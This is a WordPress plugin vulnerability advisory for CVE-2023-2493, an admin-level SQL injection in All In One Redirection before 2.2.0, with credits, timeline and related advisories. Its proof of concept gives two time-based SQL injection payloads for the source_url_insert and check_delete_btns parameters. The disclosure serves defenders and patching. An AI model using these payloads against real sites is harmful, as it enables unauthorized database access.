All In One Redirection < 2.2.0 – Admin+ SQLi | CVE 2023-2493 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape multiple parameters before using them in an SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

Proof of Concept

When adding a redirection, `source_url_insert` is vulnerable with the payload: `source_url_insert =%2ftest.html'%2b(select*from(select(sleep(8)))a)%2b'`

When deleting a redirect, `check_delete_btns` is vulnerable with the payload: `check_delete_btns%5B%5D=(select*from(select(sleep(20)))a

Adding the payload to the affected parameters results in the execution of the SQL query.

Affects Plugins

all-in-one-redirection

Fixed in 2.2.0

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Chien Vuong

Submitter

Chien Vuong

Verified

Yes

WPVDB ID

a9a205a4-eef9-4f30-877a-4c562930650c

Timeline

Publicly Published

2023-06-19 (about 10 months ago)

Added

2023-06-19 (about 10 months ago)

Last Updated

2023-06-19 (about 10 months ago)

Other

Published

Title

Published

2014-08-01

Title

Comment Control 0.3.0 - comment-control.php type Parameter SQL Injection

Published

2023-12-21

Title

MF Gig Calendar <=1.2.1 - Authenticated(Contributor+) SQL Injection

Published

2015-07-15

Title

Smooth Slider < 2.7 - Authenticated SQL Injection

Published

2014-08-01

Title

bbPress - Multiple Script Malformed Input Path Disclosure

Published

2023-01-31

Title

WP Statistics < 13.2.11 - Subscriber+ SQLi